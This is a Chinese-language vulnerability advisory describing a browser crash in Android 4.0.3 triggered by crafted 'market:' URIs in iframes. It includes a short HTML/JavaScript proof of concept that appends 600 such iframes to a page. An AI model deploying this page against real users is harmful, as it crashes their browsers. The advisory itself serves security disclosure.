漏洞起因
设计错误
危险等级
中
影响系统
Android 4.0.3
不受影响系统
危害
远程攻击者可以利用漏洞可使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户解析。
漏洞信息
Open Handset Alliance Android是一款超过30家科技与移动电话公司所组成的团体开发的免费的移动电话平台。
Android 4.0.3浏览器应用不正确处理特殊的URI,允许攻击者在IFRAME元素SRC属性中使用特制的market: URI并诱使应用程序解析,可使应用程序崩溃。
测试方法
<html>
<body>
<script type=”text/javascript”>
var m_frame = “”;
for(var i = 0; i < 600; i++)
{
m_frame = document.createElement(“iframe”);
m_frame.setAttribute(“src”, “market://a”);
document.body.appendChild(m_frame);
}
</script>
</body>
</html>
厂商解决方案
目前没有详细解决方案提供:
http://www.android.com/
漏洞提供者
Jean Pascal Pereira <pereira@secbiz.de>
评论关闭。